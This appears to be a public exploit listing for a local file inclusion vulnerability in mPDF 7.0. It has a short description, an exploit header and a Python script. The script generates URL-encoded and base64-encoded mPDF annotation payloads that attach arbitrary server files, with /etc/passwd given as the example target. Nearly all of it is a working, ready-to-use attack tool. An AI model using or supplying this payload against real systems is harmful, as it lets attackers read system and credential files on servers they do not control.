mPDF 7.0 Local File Inclusion

mPDF version 7.0 suffers from a local file inclusion vulnerability.


SHA-256 | d9e2013ea0d6ee6260c03fe9651f945af86d37023bb012c16b218a5ba2c4c1f8

# Exploit Title: mPDF 7.0 - Local File Inclusion
# Google Dork: N/A
# Date: 2022-07-23
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://mpdf.github.io/
# Software Link: https://mpdf.github.io/
# Version: CuteNews
# Tested on: Ubuntu 20.04, mPDF 7.0.x
# CVE: N/A

#!/usr/bin/env python3

from urllib.parse import quote
from cmd import Cmd
from base64 import b64encode

class Terminal(Cmd):
prompt = "\nFile >> "
def default(self, args):
payload_gen(args)
def banner():
banner = """ _____ _____ ______ ______ ___ __ __ _ _ _
| __ \| __ \| ____| |____ / _ \ \ \ / / | | (_) |
_ __ ___ | |__) | | | | |__ / / | | | \ V / _____ ___ __ | | ___ _| |_
| '_ ` _ \| ___/| | | | __| / /| | | | > < / _ \ \/ / '_ \| |/ _ \| | __|
| | | | | | | | |__| | | / / | |_| | / . \ | __/> <| |_) | | (_) | | |_
|_| |_| |_|_| |_____/|_| /_/ (_)___(_)_/ \_\ \___/_/\_\ .__/|_|\___/|_|\__|
| |
|_| """
print(banner)
def payload_gen(fname):
payload = f'<annotation file="{fname}" content="{fname}" icon="Graph" title="Attached File: {fname}" pos-x="195" />'
encoded_payload = quote(payload)
print("[+] Replace the content with the payload below")

print(f"Url encoded payload:\n{encoded_payload}\n")
base64enc = b64encode(encoded_payload.encode())
print(f"Base64 encoded payload:\n{base64enc.decode()}\n")
if __name__ == ("__main__"):
banner()
print("Enter Filename eg. /etc/passwd")
terminal= Terminal()
terminal.cmdloop()


Related Posts